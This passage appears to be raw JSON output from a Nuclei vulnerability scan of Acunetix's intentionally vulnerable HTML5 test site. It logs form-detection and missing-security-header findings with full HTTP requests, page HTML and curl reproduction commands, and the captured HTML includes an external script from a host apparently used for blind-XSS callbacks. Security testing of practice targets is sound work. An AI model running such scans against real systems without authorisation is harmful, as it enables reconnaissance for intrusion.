href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:38:18.504112407Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/form-detection.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/form-detection\",\"template-id\":\"form-detection\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/form-detection.yaml\",\"info\":{\"name\":\"Form Detection\",\"author\":[\"pdteam\"],\"tags\":[\"form\",\"misc\",\"miscellaneous\"],\"description\":\"A template to detect HTML Forms in page response.\\n\",\"reference\":[\"https://github.com/dirtycoder0124/formcrawler\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:38:18 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:38:18.892574368Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 XTPT/1.0' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506444006Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 